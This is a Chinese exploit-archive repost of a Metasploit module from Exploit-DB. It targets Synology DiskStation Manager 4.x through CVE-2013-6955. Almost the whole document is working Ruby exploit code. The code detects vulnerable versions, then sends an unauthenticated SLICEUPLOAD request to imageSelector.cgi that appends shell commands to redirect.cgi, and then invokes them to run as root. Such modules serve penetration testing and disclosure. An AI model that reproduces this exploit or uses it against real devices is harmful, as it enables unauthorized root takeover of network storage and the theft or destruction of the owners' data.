Synology DiskStation Manager – SLICEUPLOAD Remote Command Execution (Metasploit)

  • 作者: Metasploit
    日期: 2013-12-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/30470/
  • ##
    ## This module requires Metasploit: http//metasploit.com/download
    ## Current source: https://github.com/rapid7/metasploit-framework
    ###
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HttpClient
    
    DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
    &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x
    
    def initialize(info={})
    super(update_info(info,
    'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
    'Description'=> %q{
    This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
    versions 4.x, which allows the execution of arbitrary commands under root
    privileges.
    The vulnerability is located in /webman/imageSelector.cgi, which allows to append
    arbitrary data to a given file using a so called SLICEUPLOAD functionality, which
    can be triggered by an unauthenticated user with a specially crafted HTTP request.
    This is exploited by this module to append the given commands to /redirect.cgi,
    which is a regular shell script file, and can be invoked with another HTTP request.
    Synology reported that the vulnerability has been fixed with versions 4.0-2259,
    4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.
    },
    'Author' =>
    [
    'Markus Wulftange' # Discovery, Metasploit module
    ],
    'References' =>
    [
    [ 'CVE', '2013-6955' ],
    ],
    'Privileged' => false,
    'Platform' => ['unix'],
    'Arch' => ARCH_CMD,
    'Payload'=>
    {
    'DisableNops' => true,
    'Space' => 0x31337,
    'Compat'=>
    {
    'PayloadType' => 'cmd',
    'RequiredCmd' => 'generic perl telnet',
    }
    },
    'Targets'=>
    [
    ['Automatic', {}]
    ],
    'DefaultTarget'=> 0,
    'License'=> MSF_LICENSE,
    'DisclosureDate' => 'Oct 31 2013'
    ))
    
    register_options(
    [
    Opt::RPORT(5000)
    ], self.class)
    end
    
    def check
    print_status("#{peer} - Trying to detect installed version")
    
    res = send_request_cgi({
    'method' => 'GET',
    'uri'=> normalize_uri('webman', 'info.cgi'),
    'vars_get' => { 'host' => ''}
    })
    
    if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN
    version = "#{$~[:major]}.#{$~[:minor]}"
    build = $~[:build]
    model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
    model = "DS#{model}" unless model =~ /^[A-Z]/
    else
    print_status("#{peer} - Detection failed")
    return Exploit::CheckCode::Unknown
    end
    
    print_status("#{peer} - Model #{model} with version #{version}-#{build} detected")
    
    case version
    when '4.0'
    return Exploit::CheckCode::Vulnerable if build < '2259'
    when '4.1'
    return Exploit::CheckCode::Vulnerable
    when '4.2'
    return Exploit::CheckCode::Vulnerable if build < '3243'
    when '4.3'
    return Exploit::CheckCode::Vulnerable if build < '3810'
    return Exploit::CheckCode::Detected if build == '3810'
    end
    
    Exploit::CheckCode::Safe
    end
    
    def exploit
    cmds = [
    # sed is used to restore the redirect.cgi
    "sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi",
    payload.encoded
    ].join("\n")
    
    mime_msg = Rex::MIME::Message.new
    mime_msg.add_part('login', nil, nil, 'form-data; name="source"')
    mime_msg.add_part('logo', nil, nil, 'form-data; name="type"')
    
    # unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n,
    # so we use a placeholder and replace it later
    cmd_placeholder = Rex::Text::rand_text_alphanumeric(10)
    mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil,
    'form-data; name="foo"; filename="bar"')
    
    post_body = mime_msg.to_s
    post_body.strip!
    post_body.sub!(cmd_placeholder, cmds)
    
    # fix multipart encoding
    post_body.gsub!(/\r\n(--#{mime_msg.bound})/, '\\1')
    
    # send request to append shell commands
    print_status("#{peer} - Injecting the payload...")
    res = send_request_cgi({
    'method'=> 'POST',
    'uri' => normalize_uri('webman', 'imageSelector.cgi'),
    'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}",
    'headers' => {
    'X-TYPE-NAME' => 'SLICEUPLOAD',
    'X-TMP-FILE'=> '/usr/syno/synoman/redirect.cgi'
    },
    'data'=> post_body
    })
    
    unless res and res.code == 200 and res.body.include?('error_noprivilege')
    fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
    end
    
    # send request to invoke the injected shell commands
    print_status("#{peer} - Executing the payload...")
    res = send_request_cgi({
    'method' => 'GET',
    'uri'=> normalize_uri('redirect.cgi'),
    })
    
    # Read command output if cmd/unix/generic payload was used
    if datastore['CMD']
    unless res and res.code == 200
    fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
    end
    
    print_good("#{peer} - Command successfully executed")
    print_line(res.body)
    end
    end
    end